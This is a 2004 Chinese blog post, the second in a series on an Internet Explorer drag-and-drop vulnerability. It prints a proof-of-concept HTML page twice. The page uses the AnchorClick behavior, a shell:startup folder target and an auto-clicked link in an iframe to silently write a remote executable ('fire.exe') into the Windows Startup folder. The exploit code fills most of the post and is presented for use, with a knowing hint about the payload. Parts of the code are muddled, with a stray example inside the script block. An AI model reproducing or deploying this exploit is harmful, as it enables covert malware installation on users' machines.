IE拖放漏洞详解二
2004-11-14 19:38
701 查看
第二个要利用的漏洞就是在IE中显示一个本地的目录,当然这里的显示不是说要让人看见,而是要让机器能看见。并且当下面a元素的folder属性为目录或是shell:startup时以及a元素支持anchorclick行为时,就可以在网页的ifram中显示目录并且可以将远程文件在没有任何提示的情况下写到这个目录中,为了不要让人看见他的目录显示在了网页中,我们还有把iframe放在div中,将其属性设为HIDDEN
+-----------------------------------iframe.html Code---------------------------+
<html>
<head>
<style>
a {
behavior:url(#default#AnchorClick);
}
<!--关键,定义a元素的行为,让动作的执行不会有任何的提示-->
</style>
</head>
<body >
<img id="dyn" dynsrc="fire.exe" >
<!--这里这个fire.exe你应该知道是什么吧-->
<div>
<iframe name="clientframe" id="clientframe" style="position:absolute;width:200px;height:200px;"></iframe>
</div>
<a folder="shell:startup" id="clientcall" target="clientframe"></a>
<!--shell:startup就是启动目录,你可以在浏览器的窗口输入shell:startup看看-->
<script language="JavaScript" type="text/javascript">
document.getElementById("clientcall").click()
<!--关键字 getElementById,获取对 ID 标签属性为指定值的第一个对象的引用-->
####################### 举例 #########################################
<button onclick='alert(document.getElementById("a").outerHTML)'>访问a</button>
<img name=a>
<img name=a src='c'>
##########################################################################
</script>
</body>
</html>
+----------------------------------end--------------------------------------+
+-----------------------------------iframe.html Code---------------------------+
<html>
<head>
<style>
a {
behavior:url(#default#AnchorClick);
}
<!--关键,定义a元素的行为,让动作的执行不会有任何的提示-->
</style>
</head>
<body >
<img id="dyn" dynsrc="fire.exe" >
<!--这里这个fire.exe你应该知道是什么吧-->
<div>
<iframe name="clientframe" id="clientframe" style="position:absolute;width:200px;height:200px;"></iframe>
</div>
<a folder="shell:startup" id="clientcall" target="clientframe"></a>
<!--shell:startup就是启动目录,你可以在浏览器的窗口输入shell:startup看看-->
<script language="JavaScript" type="text/javascript">
document.getElementById("clientcall").click()
<!--关键字 getElementById,获取对 ID 标签属性为指定值的第一个对象的引用-->
####################### 举例 #########################################
<button onclick='alert(document.getElementById("a").outerHTML)'>访问a</button>
<img name=a>
<img name=a src='c'>
##########################################################################
</script>
</body>
</html>
+----------------------------------end--------------------------------------+
相关文章推荐
- JavaScript封装的常用工具类库bee.js用法详解【经典类库】
- javascript表单之间的数据传递!
- VB五子棋问题,请高手赐教
- Struts tags (4) ----Html(2)
- 从数据库中动态选取下拉列表的方法
- Struts国际化问题
- 移居csdn,今天想到自己的写shell的能力需要提高~
- java调用exe或sh的代码
- 升级IE之后,终于贴上文章了!
- 今天开始研究javaScript
- The world's top 200 universities
- asp.net server side using JavaScript
- 如何根据下拉列表框的值来给textarea或者其它容器动态的增加内容?
- 组件制作之一(概念)
- 组件制作之四(定制外观)
- 组件制作之五(托盘组件)
- BMP格式
- TBITMAP双缓冲